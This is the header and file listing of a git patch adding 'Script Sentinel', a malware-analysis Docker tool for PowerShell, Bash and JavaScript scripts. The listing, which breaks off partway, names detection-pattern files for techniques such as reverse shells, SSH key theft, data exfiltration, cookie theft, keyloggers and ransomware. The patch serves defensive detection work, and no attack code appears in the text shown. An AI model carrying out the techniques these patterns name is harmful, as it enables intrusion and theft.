From 74eb8b25e0e22b8d801febc7cc3654a6a16c3075 Mon Sep 17 00:00:00 2001 From: aperetz Date: Sun, 23 Nov 2025 13:38:42 +0200 Subject: [PATCH 01/14] Add Script Sentinel Docker image for malware analysis - Analyzes PowerShell, Bash, and JavaScript scripts - MITRE ATT&CK technique identification - IOC extraction and XDR context - Based on demisto/python3 Alpine image - Non-root user for security - Includes verification script - Poetry-based dependency management --- docker/script-sentinel/.gitignore | 1 + docker/script-sentinel/Dockerfile | 53 + docker/script-sentinel/README.md | 44 + docker/script-sentinel/build.conf | 1 + docker/script-sentinel/docker-entrypoint.sh | 18 + docker/script-sentinel/poetry.lock | 70 + docker/script-sentinel/pyproject.toml | 20 + docker/script-sentinel/sentinel/__init__.py | 0 docker/script-sentinel/sentinel/adk_agent.py | 441 + docker/script-sentinel/sentinel/analyzer.py | 563 + .../sentinel/data/mitre_attack.json | 150 + docker/script-sentinel/sentinel/extractor.py | 438 + .../tree-sitter-javascript/.editorconfig | 46 + .../tree-sitter-javascript/.gitattributes | 42 + .../.github/FUNDING.yml | 15 + .../.github/ISSUE_TEMPLATE/bug_report.md | 31 + .../.github/ISSUE_TEMPLATE/feature_request.md | 13 + .../.github/dependabot.yml | 8 + .../.github/workflows/ci.yml | 54 + .../.github/workflows/fuzz.yml | 19 + .../.github/workflows/lint.yml | 26 + .../.github/workflows/publish.yml | 35 + .../tree-sitter-javascript/.gitignore | 47 + .../tree-sitter-javascript/CMakeLists.txt | 66 + .../tree-sitter-javascript/Cargo.lock | 199 + .../tree-sitter-javascript/Cargo.toml | 37 + .../grammars/tree-sitter-javascript/LICENSE | 21 + .../grammars/tree-sitter-javascript/Makefile | 99 + .../tree-sitter-javascript/Package.resolved | 16 + .../tree-sitter-javascript/Package.swift | 41 + .../grammars/tree-sitter-javascript/README.md | 27 + .../tree-sitter-javascript/binding.gyp | 35 + .../bindings/c/tree-sitter-javascript.pc.in | 10 + 
.../c/tree_sitter/tree-sitter-javascript.h | 16 + .../bindings/go/binding.go | 15 + .../bindings/go/binding_test.go | 15 + .../bindings/node/binding.cc | 19 + .../bindings/node/binding_test.js | 9 + .../bindings/node/index.d.ts | 27 + .../bindings/node/index.js | 11 + .../bindings/python/tests/test_binding.py | 11 + .../python/tree_sitter_javascript/__init__.py | 40 + .../tree_sitter_javascript/__init__.pyi | 8 + .../python/tree_sitter_javascript/binding.c | 35 + .../python/tree_sitter_javascript/py.typed | 0 .../bindings/rust/build.rs | 24 + .../bindings/rust/lib.rs | 62 + .../swift/TreeSitterJavaScript/javascript.h | 16 + .../TreeSitterJavaScriptTests.swift | 12 + .../tree-sitter-javascript/eslint.config.mjs | 5 + .../tree-sitter-javascript/examples/jquery.js | 9190 ++ .../examples/text-editor-component.js | 4446 + .../grammars/tree-sitter-javascript/go.mod | 7 + .../grammars/tree-sitter-javascript/go.sum | 34 + .../tree-sitter-javascript/grammar.js | 1324 + .../tree-sitter-javascript/package-lock.json | 1563 + .../tree-sitter-javascript/package.json | 60 + .../tree-sitter-javascript/pyproject.toml | 32 + .../queries/highlights-jsx.scm | 8 + .../queries/highlights-params.scm | 12 + .../queries/highlights.scm | 204 + .../queries/injections.scm | 31 + .../tree-sitter-javascript/queries/locals.scm | 23 + .../tree-sitter-javascript/queries/tags.scm | 99 + .../grammars/tree-sitter-javascript/setup.py | 77 + .../tree-sitter-javascript/src/grammar.json | 7261 + .../src/node-types.json | 3622 + .../tree-sitter-javascript/src/parser.c | 94268 +++++++++++ .../tree-sitter-javascript/src/scanner.c | 364 + .../src/tree_sitter/alloc.h | 54 + .../src/tree_sitter/array.h | 291 + .../src/tree_sitter/parser.h | 286 + .../test/corpus/destructuring.txt | 135 + .../test/corpus/expressions.txt | 2346 + .../test/corpus/injectables.txt | 43 + .../test/corpus/literals.txt | 173 + .../test/corpus/semicolon_insertion.txt | 309 + .../test/corpus/statements.txt | 1464 + 
.../test/highlight/functions.js | 48 + .../test/highlight/imports.js | 4 + .../test/highlight/injection.js | 5 + .../test/highlight/keywords.js | 12 + .../test/highlight/variables.js | 48 + .../test/tags/classes.js | 14 + .../test/tags/functions.js | 22 + .../tree-sitter-javascript/tree-sitter.json | 51 + .../tree-sitter-powershell/.editorconfig | 39 + .../grammars/tree-sitter-powershell/.envrc | 1 + .../tree-sitter-powershell/.gitattributes | 11 + .../tree-sitter-powershell/.gitignore | 11 + .../tree-sitter-powershell/Cargo.toml | 24 + .../grammars/tree-sitter-powershell/LICENSE | 21 + .../grammars/tree-sitter-powershell/Makefile | 112 + .../tree-sitter-powershell/Package.swift | 47 + .../grammars/tree-sitter-powershell/README.md | 7 + .../tree-sitter-powershell/binding.gyp | 30 + .../bindings/c/tree-sitter-powershell.h | 16 + .../bindings/c/tree-sitter-powershell.pc.in | 11 + .../bindings/go/binding.go | 13 + .../bindings/go/binding_test.go | 15 + .../tree-sitter-powershell/bindings/go/go.mod | 5 + .../bindings/node/binding.cc | 20 + .../bindings/node/index.d.ts | 28 + .../bindings/node/index.js | 7 + .../python/tree_sitter_powershell/__init__.py | 5 + .../tree_sitter_powershell/__init__.pyi | 1 + .../python/tree_sitter_powershell/binding.c | 27 + .../python/tree_sitter_powershell/py.typed | 0 .../bindings/rust/build.rs | 24 + .../bindings/rust/lib.rs | 50 + .../swift/TreeSitterPowershell/powershell.h | 16 + .../tree-sitter-powershell/flake.lock | 78 + .../grammars/tree-sitter-powershell/flake.nix | 44 + .../tree-sitter-powershell/grammar.js | 981 + .../tree-sitter-powershell/package.json | 45 + .../tree-sitter-powershell/pyproject.toml | 29 + .../queries/highlights.scm | 128 + .../grammars/tree-sitter-powershell/setup.py | 60 + .../tree-sitter-powershell/src/grammar.json | 6542 + .../src/node-types.json | 4114 + .../tree-sitter-powershell/src/parser.c | 128367 +++++++++++++++ .../tree-sitter-powershell/src/scanner.c | 71 + .../src/tree_sitter/alloc.h | 54 + 
.../src/tree_sitter/array.h | 290 + .../src/tree_sitter/parser.h | 266 + .../test/corpus/branch.txt | 815 + .../test/corpus/classes.txt | 238 + .../test/corpus/commands.txt | 527 + .../test/corpus/comments.txt | 209 + .../test/corpus/enum.txt | 76 + .../test/corpus/expressions.txt | 674 + .../test/corpus/functions.txt | 504 + .../test/corpus/loops.txt | 701 + .../test/corpus/number.txt | 250 + .../test/corpus/obfuscated.txt | 183 + .../test/corpus/operators.txt | 656 + .../test/corpus/pipeline_chains.txt | 106 + .../test/corpus/strings.txt | 554 + .../test/corpus/type.txt | 269 + .../test/corpus/variables.txt | 559 + .../tree-sitter-powershell/tree-sitter.json | 34 + docker/script-sentinel/sentinel/heuristics.py | 517 + .../script-sentinel/sentinel/ioc_extractor.py | 556 + docker/script-sentinel/sentinel/main.py | 227 + docker/script-sentinel/sentinel/mitre.py | 179 + docker/script-sentinel/sentinel/models.py | 304 + .../script-sentinel/sentinel/obfuscation.py | 1071 + docker/script-sentinel/sentinel/parser.py | 183 + .../sentinel/patterns/__init__.py | 19 + .../patterns/bash/bash-001-reverse-shell.yaml | 32 + .../patterns/bash/bash-002-curl-download.yaml | 31 + .../bash/bash-003-privilege-escalation.yaml | 32 + .../bash/bash-004-cron-persistence.yaml | 35 + .../patterns/bash/bash-005-ssh-key-theft.yaml | 35 + .../bash/bash-006-history-manipulation.yaml | 36 + .../bash/bash-007-password-harvesting.yaml | 36 + .../bash/bash-008-systemd-persistence.yaml | 35 + .../bash/bash-009-data-exfiltration.yaml | 36 + .../bash/bash-010-kernel-module-loading.yaml | 35 + .../bash/bash-011-process-hiding.yaml | 35 + .../bash/bash-012-network-scanning.yaml | 36 + .../patterns/bash/bash-013-log-deletion.yaml | 36 + .../bash/bash-014-container-escape.yaml | 35 + .../patterns/bash/bash-015-backdoor-user.yaml | 36 + .../patterns/bash/bash-016-dns-tunneling.yaml | 35 + .../bash/bash-017-webshell-indicators.yaml | 35 + .../bash/bash-018-suspicious-compression.yaml | 37 + 
.../patterns/bash/bash-019-netcat-lolbin.yaml | 33 + .../patterns/bash/bash-020-perl-lolbin.yaml | 32 + .../patterns/bash/bash-021-python-lolbin.yaml | 32 + .../bash/bash-022-file-monitoring.yaml | 32 + .../bash/bash-023-network-sniffing.yaml | 32 + .../patterns/bash/bash-024-port-scanning.yaml | 32 + .../bash/bash-025-memory-execution.yaml | 35 + .../bash/bash-026-arithmetic-encoding.yaml | 34 + .../bash/bash-027-variable-indirection.yaml | 34 + .../javascript/js-001-eval-usage.yaml | 33 + .../javascript/js-002-dynamic-script.yaml | 32 + .../javascript/js-003-obfuscation.yaml | 32 + .../js-004-function-constructor.yaml | 35 + .../javascript/js-005-document-write.yaml | 35 + .../js-006-innerhtml-assignment.yaml | 35 + .../js-007-websocket-exfiltration.yaml | 35 + .../javascript/js-008-crypto-mining.yaml | 35 + .../patterns/javascript/js-009-keylogger.yaml | 35 + .../javascript/js-010-localstorage-theft.yaml | 35 + .../javascript/js-011-iframe-injection.yaml | 35 + .../javascript/js-012-atob-decode.yaml | 35 + .../javascript/js-013-formgrabber.yaml | 35 + .../js-014-geolocation-tracking.yaml | 35 + .../js-015-clipboard-hijacking.yaml | 35 + .../js-016-browser-fingerprinting.yaml | 35 + .../js-017-prototype-pollution.yaml | 35 + .../javascript/js-018-dom-clobbering.yaml | 35 + .../javascript/js-019-cookie-theft.yaml | 34 + .../javascript/js-020-activex-lolbin.yaml | 33 + .../js-021-browser-extension-api.yaml | 37 + .../javascript/js-022-service-worker.yaml | 36 + .../javascript/js-023-webassembly.yaml | 38 + .../javascript/js-024-dom-clobbering.yaml | 36 + .../js-025-string-fromcharcode.yaml | 34 + .../javascript/js-026-anti-debugging.yaml | 34 + .../js-027-boolean-algebra-obfuscation.yaml | 34 + .../js-028-control-flow-flattening.yaml | 35 + .../js-029-suspicious-long-strings.yaml | 33 + .../sentinel/patterns/loader.py | 293 + .../sentinel/patterns/models.py | 180 + .../powershell/ps-001-invoke-expression.yaml | 34 + .../powershell/ps-002-base64-encoded.yaml | 30 + 
.../powershell/ps-003-download-cradle.yaml | 30 + .../ps-004-registry-persistence.yaml | 35 + .../powershell/ps-005-wmi-execution.yaml | 35 + .../powershell/ps-006-process-injection.yaml | 36 + .../powershell/ps-007-credential-dumping.yaml | 36 + .../powershell/ps-008-scheduled-task.yaml | 35 + .../ps-009-powershell-remoting.yaml | 36 + .../powershell/ps-010-amsi-bypass.yaml | 35 + .../powershell/ps-011-logging-evasion.yaml | 35 + .../powershell/ps-012-reflective-loading.yaml | 35 + .../powershell/ps-013-com-object-abuse.yaml | 35 + .../powershell/ps-014-hidden-window.yaml | 35 + .../powershell/ps-015-clipboard-access.yaml | 35 + .../powershell/ps-016-network-share-enum.yaml | 36 + .../ps-017-service-manipulation.yaml | 36 + .../powershell/ps-018-token-manipulation.yaml | 37 + .../patterns/powershell/ps-019-keylogger.yaml | 33 + .../powershell/ps-020-ransomware.yaml | 35 + .../powershell/ps-021-bitsadmin-lolbin.yaml | 32 + .../powershell/ps-022-mshta-lolbin.yaml | 33 + .../powershell/ps-023-regsvr32-lolbin.yaml | 32 + .../powershell/ps-024-rundll32-lolbin.yaml | 32 + .../powershell/ps-025-process-monitoring.yaml | 32 + .../ps-026-registry-monitoring.yaml | 33 + .../powershell/ps-027-network-scanning.yaml | 33 + .../powershell/ps-028-certutil-download.yaml | 35 + .../ps-030-reflective-dll-injection.yaml | 35 + .../powershell/ps-031-process-hollowing.yaml | 36 + .../ps-032-embedded-binary-execution.yaml | 35 + .../sentinel/patterns/registry.py | 274 + .../sentinel/patterns/schema.yaml | 144 + .../sentinel/reporters/__init__.py | 14 + .../sentinel/reporters/console_reporter.py | 590 + .../sentinel/reporters/json_reporter.py | 204 + .../sentinel/reporters/markdown_reporter.py | 562 + docker/script-sentinel/sentinel/sanitizer.py | 364 + docker/script-sentinel/sentinel/verdict.py | 341 + docker/script-sentinel/verify.py | 19 + docker/script-sentinel/xsiam_wrapper.py | 495 + 248 files changed, 288434 insertions(+) create mode 100644 docker/script-sentinel/.gitignore 
create mode 100644 docker/script-sentinel/Dockerfile create mode 100644 docker/script-sentinel/README.md create mode 100644 docker/script-sentinel/build.conf create mode 100644 docker/script-sentinel/docker-entrypoint.sh create mode 100644 docker/script-sentinel/poetry.lock create mode 100644 docker/script-sentinel/pyproject.toml create mode 100644 docker/script-sentinel/sentinel/__init__.py create mode 100644 docker/script-sentinel/sentinel/adk_agent.py create mode 100644 docker/script-sentinel/sentinel/analyzer.py create mode 100644 docker/script-sentinel/sentinel/data/mitre_attack.json create mode 100644 docker/script-sentinel/sentinel/extractor.py create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.editorconfig create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.gitattributes create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/FUNDING.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/ISSUE_TEMPLATE/bug_report.md create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/ISSUE_TEMPLATE/feature_request.md create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/dependabot.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/workflows/ci.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/workflows/fuzz.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/workflows/lint.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/workflows/publish.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.gitignore create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/CMakeLists.txt create mode 100644 
docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/Cargo.lock create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/Cargo.toml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/LICENSE create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/Makefile create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/Package.resolved create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/Package.swift create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/README.md create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/binding.gyp create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/c/tree-sitter-javascript.pc.in create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/c/tree_sitter/tree-sitter-javascript.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/go/binding.go create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/go/binding_test.go create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/node/binding.cc create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/node/binding_test.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/node/index.d.ts create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/node/index.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/python/tests/test_binding.py create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/python/tree_sitter_javascript/__init__.py create mode 100644 
docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/python/tree_sitter_javascript/__init__.pyi create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/python/tree_sitter_javascript/binding.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/python/tree_sitter_javascript/py.typed create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/rust/build.rs create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/rust/lib.rs create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/swift/TreeSitterJavaScript/javascript.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/swift/TreeSitterJavaScriptTests/TreeSitterJavaScriptTests.swift create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/eslint.config.mjs create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/examples/jquery.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/examples/text-editor-component.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/go.mod create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/go.sum create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/grammar.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/package-lock.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/package.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/pyproject.toml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/highlights-jsx.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/highlights-params.scm create 
mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/highlights.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/injections.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/locals.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/tags.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/setup.py create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/grammar.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/node-types.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/parser.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/scanner.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/tree_sitter/alloc.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/tree_sitter/array.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/tree_sitter/parser.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/destructuring.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/expressions.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/injectables.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/literals.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/semicolon_insertion.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/statements.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/highlight/functions.js 
create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/highlight/imports.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/highlight/injection.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/highlight/keywords.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/highlight/variables.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/tags/classes.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/tags/functions.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/tree-sitter.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/.editorconfig create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/.envrc create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/.gitattributes create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/.gitignore create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/Cargo.toml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/LICENSE create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/Makefile create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/Package.swift create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/README.md create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/binding.gyp create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/c/tree-sitter-powershell.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/c/tree-sitter-powershell.pc.in create mode 100644 
docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/go/binding.go create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/go/binding_test.go create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/go/go.mod create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/node/binding.cc create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/node/index.d.ts create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/node/index.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/python/tree_sitter_powershell/__init__.py create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/python/tree_sitter_powershell/__init__.pyi create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/python/tree_sitter_powershell/binding.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/python/tree_sitter_powershell/py.typed create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/rust/build.rs create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/rust/lib.rs create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/swift/TreeSitterPowershell/powershell.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/flake.lock create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/flake.nix create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/grammar.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/package.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/pyproject.toml create mode 100644 
docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/queries/highlights.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/setup.py create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/grammar.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/node-types.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/parser.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/scanner.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/tree_sitter/alloc.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/tree_sitter/array.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/tree_sitter/parser.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/branch.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/classes.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/commands.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/comments.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/enum.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/expressions.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/functions.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/loops.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/number.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/obfuscated.txt create mode 100644 
docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/operators.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/pipeline_chains.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/strings.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/type.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/variables.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/tree-sitter.json create mode 100644 docker/script-sentinel/sentinel/heuristics.py create mode 100644 docker/script-sentinel/sentinel/ioc_extractor.py create mode 100755 docker/script-sentinel/sentinel/main.py create mode 100644 docker/script-sentinel/sentinel/mitre.py create mode 100644 docker/script-sentinel/sentinel/models.py create mode 100644 docker/script-sentinel/sentinel/obfuscation.py create mode 100644 docker/script-sentinel/sentinel/parser.py create mode 100644 docker/script-sentinel/sentinel/patterns/__init__.py create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-001-reverse-shell.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-002-curl-download.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-003-privilege-escalation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-004-cron-persistence.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-005-ssh-key-theft.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-006-history-manipulation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-007-password-harvesting.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-008-systemd-persistence.yaml create mode 100644 
docker/script-sentinel/sentinel/patterns/bash/bash-009-data-exfiltration.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-010-kernel-module-loading.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-011-process-hiding.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-012-network-scanning.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-013-log-deletion.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-014-container-escape.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-015-backdoor-user.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-016-dns-tunneling.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-017-webshell-indicators.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-018-suspicious-compression.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-019-netcat-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-020-perl-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-021-python-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-022-file-monitoring.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-023-network-sniffing.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-024-port-scanning.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-025-memory-execution.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-026-arithmetic-encoding.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-027-variable-indirection.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-001-eval-usage.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-002-dynamic-script.yaml create 
mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-003-obfuscation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-004-function-constructor.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-005-document-write.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-006-innerhtml-assignment.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-007-websocket-exfiltration.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-008-crypto-mining.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-009-keylogger.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-010-localstorage-theft.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-011-iframe-injection.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-012-atob-decode.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-013-formgrabber.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-014-geolocation-tracking.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-015-clipboard-hijacking.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-016-browser-fingerprinting.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-017-prototype-pollution.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-018-dom-clobbering.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-019-cookie-theft.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-020-activex-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-021-browser-extension-api.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-022-service-worker.yaml create 
